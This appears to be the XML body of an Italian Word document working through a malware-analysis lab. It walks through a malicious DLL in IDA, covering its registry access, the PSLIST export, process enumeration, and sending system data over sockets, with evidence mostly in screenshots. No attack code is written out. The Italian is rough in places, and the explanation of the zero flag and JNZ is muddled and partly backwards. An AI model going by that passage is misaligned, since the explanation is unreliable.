    <w:p w14:paraId="5963305E" w14:textId="78561F5C" w:rsidR="00FF1CD1" w:rsidRDefault="00FF1CD1" w:rsidP="00FF1CD1">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D19C4D2" w14:textId="57C3CB54" w:rsidR="00FF1CD1" w:rsidRDefault="00BD17A6" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D5C4816" wp14:editId="4BDA34C2">
            <wp:extent cx="6645910" cy="2179320"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="318079012" name="Immagine 2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9012" name="Immagine 20" descr="Immagine che contiene testo, schermata, Carattere, linea&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId224"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="2179320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB19EF5" w14:textId="427333F5" w:rsidR="003B751D" w:rsidRDefault="003B751D" w:rsidP="003B751D">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Il ramo JNZ salterà se lo Zero Flag NON è IMPOSTATO (in questo caso significa che il confronto ha avuto successo). Questo perché quando parliamo di Zero Flags, in pratica chiediamo “È falso?”, e se è vero (1=True), lo Zero Flag NON È impostato, se è falso (0=False ) quindi viene impostato lo Zero Flag IS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0016A417" w14:textId="5B2BD307" w:rsidR="003B751D" w:rsidRDefault="003B751D" w:rsidP="003B751D">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Per questo motivo, se memcmp restituisce 0, la risposta alla domanda "È falso?" sarà no, indicando così un confronto riuscito. Per questo motivo il salto NON viene eseguito e finiamo per eseguire una chiamata alla subroutine sub_100052A2, quindi diamo un'occhiata.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D65EDCD" w14:textId="77777777" w:rsidR="00B2434E" w:rsidRDefault="00B2434E" w:rsidP="003B751D">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="250FA1FC" w14:textId="77777777" w:rsidR="00B2434E" w:rsidRDefault="00B2434E" w:rsidP="003B751D">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E68823F" w14:textId="77777777" w:rsidR="00B2434E" w:rsidRDefault="00B2434E" w:rsidP="003B751D">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65A7B7DD" w14:textId="269ACAC0" w:rsidR="00B2434E" w:rsidRDefault="00B2434E" w:rsidP="003B751D">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B60E80B" wp14:editId="4656E4A9">
            <wp:extent cx="6645910" cy="1475740"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2048949168" name="Immagine 2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168" name="Immagine 21" descr="Immagine che contiene testo, linea, Carattere, numero&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId225"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="1475740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F548ACA" w14:textId="1CA18F56" w:rsidR="00B2434E" w:rsidRDefault="00B2434E" w:rsidP="003B751D">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D04A91C" wp14:editId="5B6DD106">
            <wp:extent cx="6645910" cy="4831715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1644641801" name="Immagine 2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1801" name="Immagine 22" descr="Immagine che contiene testo, schermata&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId226"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="4831715"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="456E665A" w14:textId="77BFF177" w:rsidR="00B2434E" w:rsidRDefault="00B2434E" w:rsidP="003B751D">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="00B2434E">
        <w:t>Da questo possiamo vedere che sta aprendo una chiave di registro in: \SOFTWARE\Microsoft\Windows\CurrentVersion. La dichiarazione di JZ chiede verific</w:t>
      </w:r>
      <w:r w:rsidR="004226B8">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B2434E">
        <w:t>se il registro è stato aperto correttamente o meno. Finché il registro viene aperto con successo, la risposta sarebbe "False. La differenza qui è che sta saltando se il flag zero È impostato, quindi seguiamo loc_10005309.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383CE363" w14:textId="12EC2D8D" w:rsidR="00B2434E" w:rsidRDefault="00B2434E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="099C32DF" w14:textId="5F9155AD" w:rsidR="00B2434E" w:rsidRDefault="003172C5" w:rsidP="003B751D">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6590AF1A" wp14:editId="1D184EEB">
            <wp:extent cx="6645910" cy="7514590"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1915687806" name="Immagine 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7806" name="Immagine 23" descr="Immagine che contiene testo, schermata&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId227"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="7514590"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A8B7BA" w14:textId="6D53E9A6" w:rsidR="003172C5" w:rsidRDefault="001A1172" w:rsidP="003B751D">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="001A1172">
        <w:t xml:space="preserve">Qui possiamo vedere che sta interrogando le chiavi di registro WorkTime e WorkTime. </w:t>
      </w:r>
      <w:r w:rsidR="004226B8">
        <w:t xml:space="preserve">Viene </w:t>
      </w:r>
      <w:r w:rsidRPr="001A1172">
        <w:t>passa</w:t>
      </w:r>
      <w:r w:rsidR="004226B8">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00461B62">
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidRPr="001A1172">
        <w:t xml:space="preserve"> un tipo di argomento "Socket" con il valore 's'. </w:t>
      </w:r>
      <w:r w:rsidR="004226B8">
        <w:t>viene inviato</w:t>
      </w:r>
      <w:r w:rsidRPr="001A1172">
        <w:t xml:space="preserve"> ebp+s sul socket di rete passato.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A55998" w14:textId="77777777" w:rsidR="00461B62" w:rsidRDefault="00461B62" w:rsidP="003B751D">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2726EB06" w14:textId="77777777" w:rsidR="00A031E7" w:rsidRDefault="00A031E7" w:rsidP="003B751D">
      <w:pPr>
        <w:divId w:val="1276979458"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="494E52"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EBF5F8"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E5BD1A2" w14:textId="5128D958" w:rsidR="00FE1E42" w:rsidRDefault="00A031E7" w:rsidP="000D760D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="00B26AB4">
        <w:lastRenderedPageBreak/>
        <w:t>Cosa fa l'esportazione PSLIST?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39658290" w14:textId="583188AA" w:rsidR="000D760D" w:rsidRPr="00B26AB4" w:rsidRDefault="000D760D" w:rsidP="000D760D">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Esaminiamo le esportazioni della dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3AE04B" w14:textId="22947316" w:rsidR="00FE1E42" w:rsidRDefault="00384D5A" w:rsidP="004B5090">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="340FE03F" wp14:editId="742281D8">
            <wp:extent cx="3389152" cy="1292015"/>
            <wp:effectExtent l="0" t="0" r="1905" b="3810"/>
            <wp:docPr id="11763348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4892" name="Immagine 1" descr="Immagine che contiene testo, schermata, Carattere, numero&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId228"/>
                    <a:srcRect r="16559" b="22703"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3444264" cy="1313025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="530E864B" w14:textId="6386175B" w:rsidR="001A1172" w:rsidRDefault="00DF4E03" w:rsidP="00BB4E1B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4718ADE5" wp14:editId="47BE725C">
            <wp:extent cx="5743995" cy="3355596"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1000210381" name="Immagine 2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0381" name="Immagine 24" descr="Immagine che contiene testo, schermata, linea, diagramma&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId229"/>
                    <a:srcRect t="2421" b="4842"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5776322" cy="3374481"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1883EDE3" w14:textId="2C6CE8F5" w:rsidR="00DF4E03" w:rsidRDefault="00CB1007" w:rsidP="003B751D">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A seconda del risultato della funzione </w:t>
      </w:r>
      <w:r w:rsidR="00233571" w:rsidRPr="00233571">
        <w:t>sub_100036C3</w:t>
      </w:r>
      <w:r w:rsidR="00233571">
        <w:t xml:space="preserve"> verranno intrapresi due percorsi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380B0BA2" w14:textId="53A5FFC6" w:rsidR="00233571" w:rsidRDefault="00BB4E1B" w:rsidP="00BB4E1B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22522D1E" wp14:editId="00B1520B">
            <wp:extent cx="5942106" cy="2978092"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="1545307933" name="Immagine 2" descr="Immagine che contiene testo, linea,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07933" name="Immagine 2" descr="Immagine che contiene testo, linea, software, schermata&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId230"/>
                    <a:srcRect t="6614" b="5845"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6126579" cy="3070547"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1260CE" w14:textId="61106CD4" w:rsidR="00BB4E1B" w:rsidRDefault="00BB4E1B" w:rsidP="00BB4E1B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4426"/>
        </w:tabs>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">A seconda quindi del sistema operativo </w:t>
      </w:r>
      <w:r w:rsidR="00324D73">
        <w:t xml:space="preserve">verrà eseguita la subroutine </w:t>
      </w:r>
      <w:r w:rsidR="00324D73" w:rsidRPr="00324D73">
        <w:t>sub_10006518 o sub_1000664C</w:t>
      </w:r>
      <w:r w:rsidR="00324D73">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C1B522" w14:textId="4DD9E37C" w:rsidR="00DF4E03" w:rsidRDefault="001D6B7B" w:rsidP="003B751D">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AF8F7A5" wp14:editId="7BEF1B22">
            <wp:extent cx="6645910" cy="5952117"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="1942454935" name="Immagine 25"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4935" name="Immagine 25" descr="Immagine che contiene testo, schermata, schermo, software&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId231"/>
                    <a:srcRect t="2340"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="5952117"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EDDA51" w14:textId="77777777" w:rsidR="001D6B7B" w:rsidRDefault="001D6B7B" w:rsidP="003B751D">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="185617BE" w14:textId="77777777" w:rsidR="001D6B7B" w:rsidRDefault="001D6B7B" w:rsidP="003B751D">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6935CAE9" w14:textId="2EBFEDE7" w:rsidR="001D6B7B" w:rsidRDefault="0086125B" w:rsidP="003B751D">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14167ABB" wp14:editId="79F783C6">
            <wp:extent cx="6645910" cy="6901815"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1918631190" name="Immagine 26"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1190" name="Immagine 26" descr="Immagine che contiene testo, schermata, numero, schermo&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId232"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="6901815"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EEE9A2" w14:textId="77777777" w:rsidR="00E65047" w:rsidRDefault="00E65047" w:rsidP="003B751D">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52E94759" w14:textId="6BA4C9BD" w:rsidR="00E65047" w:rsidRDefault="00E65047" w:rsidP="003B751D">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Entrambe le </w:t>
      </w:r>
      <w:r w:rsidR="00D04AFC">
        <w:t xml:space="preserve">funzioni </w:t>
      </w:r>
      <w:r w:rsidR="000E5BAA">
        <w:t>raccolgono un i</w:t>
      </w:r>
      <w:r w:rsidR="00CE5258">
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="000E5BAA">
        <w:t>sieme di process</w:t>
      </w:r>
      <w:r w:rsidR="00CE5258">
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="000E5BAA">
        <w:t xml:space="preserve"> ma nel secondo caso utilizza anche una soket per inviare tali dati.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7247326D" w14:textId="3066710A" w:rsidR="003954E5" w:rsidRDefault="003954E5">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="650B66C5" w14:textId="5D18D0A9" w:rsidR="003954E5" w:rsidRDefault="003954E5" w:rsidP="003954E5">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="003954E5">
        <w:lastRenderedPageBreak/>
        <w:t>Utilizzare la modalità grafico per rappresentare graficamente i riferimenti incrociati da sub_10004E79. Quali funzioni API potrebbero essere chiamate inserendo questa funzione? Sulla base delle sole funzioni API, come potresti rinominare questa funzione?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCCEB89" w14:textId="40483170" w:rsidR="003954E5" w:rsidRDefault="009479E0" w:rsidP="00EF2839">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C9D7C0B" wp14:editId="631C4267">
            <wp:extent cx="6645910" cy="5960110"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1017050154" name="Immagine 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0154" name="Immagine 3" descr="Immagine che contiene testo, schermata, software, Pagina Web&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId233"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="5960110"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1561B287" w14:textId="73E901CF" w:rsidR="007045C6" w:rsidRDefault="007045C6" w:rsidP="00EF2839">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Possiamo dedurre che venga identificato la lingua predefinita del sistema ed inviata tramite soket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478CF1ED" w14:textId="10ED86AD" w:rsidR="00040871" w:rsidRDefault="00040871">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="36494780" w14:textId="1EFC9153" w:rsidR="00A66241" w:rsidRDefault="00CF6A46" w:rsidP="00CF6A46">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="00CF6A46">
        <w:lastRenderedPageBreak/>
        <w:t>Quante funzioni API di Windows chiama direttamente DllMain? Quanti a una profondità di 2?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0354603C" w14:textId="05981423" w:rsidR="007045C6" w:rsidRDefault="00A66241" w:rsidP="00EF2839">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09AD9743" wp14:editId="6930862B">
            <wp:extent cx="6645910" cy="3288030"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="2126925891"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5891" name="Immagine 4" descr="Immagine che contiene testo, schermata, linea, diagramma&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId234"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="3288030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE6C7B5" w14:textId="0F35C891" w:rsidR="00CF6A46" w:rsidRDefault="0066166F" w:rsidP="00EF2839">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Con livello di profondità 1, v</w:t>
      </w:r>
      <w:r w:rsidR="00CF6A46">
        <w:t xml:space="preserve">erifichiamo </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4 funzioni API Windows </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71999E87" w14:textId="6FFB4D69" w:rsidR="0066166F" w:rsidRDefault="0066166F" w:rsidP="00EF2839">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DE3B109" w14:textId="19B25A2C" w:rsidR="0066166F" w:rsidRDefault="00374D01" w:rsidP="00EF2839">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A39FAE9" wp14:editId="3772B803">
            <wp:extent cx="6645910" cy="664210"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18286004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0473" name="Immagine 1828600473"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId235"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="664210"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D417007" w14:textId="35B7C079" w:rsidR="00374D01" w:rsidRDefault="00374D01" w:rsidP="00374D01">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Con livello di profondità 2, verifichiamo 33 funzioni API Windows </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CD606D" w14:textId="36319CB1" w:rsidR="00374D01" w:rsidRDefault="007B077E" w:rsidP="007B077E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="007B077E">
        <w:t>A 0x10001701 c'è una chiamata al socket. Quali sono i tre parametri?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6052832C" w14:textId="7AA063A9" w:rsidR="007B077E" w:rsidRDefault="00737C08" w:rsidP="007B077E">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">All’indirizzo </w:t>
      </w:r>
      <w:r w:rsidRPr="007B077E">
        <w:t>0x10001701</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B31948">
        <w:t>riscontriamo</w:t>
      </w:r>
      <w:r w:rsidRPr="00737C08">
        <w:t xml:space="preserve"> una chiamata socket che accetta 3 parametri (protocollo, tipo e af) che vengono tutti inseriti nello stack prima della chiamata.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D76A67" w14:textId="552ED57F" w:rsidR="00B31948" w:rsidRDefault="001A5499" w:rsidP="007B077E">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00C141EE" wp14:editId="243A424C">
